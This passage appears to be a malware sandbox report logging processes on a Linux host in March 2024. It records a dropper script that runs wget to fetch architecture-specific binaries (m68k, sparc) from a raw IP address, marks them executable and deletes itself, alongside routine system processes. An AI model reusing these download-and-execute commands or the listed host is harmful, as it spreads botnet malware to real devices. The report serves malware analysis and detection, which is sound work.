                                                                  Arguments:wget -O shiteater http://94.156.8.244/m68k
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x shiteater
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:41
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:41
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:41
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O blyat http://94.156.8.244/sparc
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:42
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:42
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x blyat
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:42
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:42
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:42
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm wtf.sh
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/libexec/gsd-rfkill
                                                                  Arguments:/usr/libexec/gsd-rfkill
                                                                  File size:51808 bytes
                                                                  MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:20
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:20
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/lib/systemd/systemd-hostnamed
                                                                  Arguments:/lib/systemd/systemd-hostnamed
                                                                  File size:35040 bytes
                                                                  MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/sbin/gdm3
                                                                  Arguments:-
                                                                  File size:453296 bytes
                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/sbin/gdm3
                                                                  Arguments:-
                                                                  File size:453296 bytes
                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities